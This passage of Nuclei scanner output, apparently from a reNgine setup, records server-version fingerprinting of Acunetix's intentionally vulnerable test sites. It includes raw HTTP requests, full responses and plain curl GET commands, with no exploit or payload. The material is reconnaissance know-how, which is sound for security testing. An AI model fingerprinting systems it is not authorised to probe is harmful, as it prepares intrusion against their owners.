targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"extracted-results\":[\"Microsoft-IIS/8.5\"],\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:124.0) Gecko/20100101 Firefox/124.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:44:06 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=2wjwv0mlhlgham55jxmfab55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(66) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(68) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(97) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:44:10.707175007Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:124.0) Gecko/20100101 Firefox/124.0' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/microsoft/microsoft-iis-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/microsoft-iis-version\",\"template-id\":\"microsoft-iis-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/microsoft/microsoft-iis-version.yaml\",\"info\":{\"name\":\"Microsoft IIS version detect\",\"author\":[\"wlayzz\"],\"tags\":[\"tech\",\"microsoft\",\"iis\"],\"description\":\"Some Microsoft IIS servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T/\",\"extracted-results\":[\"Microsoft-IIS/8.5\"],\"request\":\"GET /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nContent-Length: 1233\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:44:08 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e403 - Forbidden: Access is 